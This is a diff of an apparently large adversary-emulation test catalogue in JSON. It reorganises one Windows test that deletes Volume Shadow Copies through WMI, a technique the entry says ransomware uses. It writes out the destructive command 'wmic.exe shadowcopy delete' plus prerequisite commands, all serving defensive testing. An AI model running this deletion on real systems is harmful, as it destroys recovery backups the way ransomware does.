@@ -703466,10 +703581,18 @@ { "name": "Windows - Delete Volume Shadow Copies via WMI", "auto_generated_guid": "6a3ff8dd-f49c-4272-a658-11c2fe58bd88", - "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nprereq_command: |\n if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\nget_prereq_command: |\n wmic shadowcopy call create Volume='C:\\'\n", + "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\n", "supported_platforms": [ "windows" ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Create volume shadow copy of C:\\ .\n", + "prereq_command": "if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "wmic shadowcopy call create Volume='C:\\'\n" + } + ], "executor": { "command": "wmic.exe shadowcopy delete\n", "name": "command_prompt", @@ -1216533,5 +1216656,5 @@ ], "relationship_map": {}, "revoked": false, - "last_updated": "2024-02-01T03:05:46.651515+00:00" + "last_updated": "2024-02-15T03:05:42.205821+00:00" } \ No newline at end of file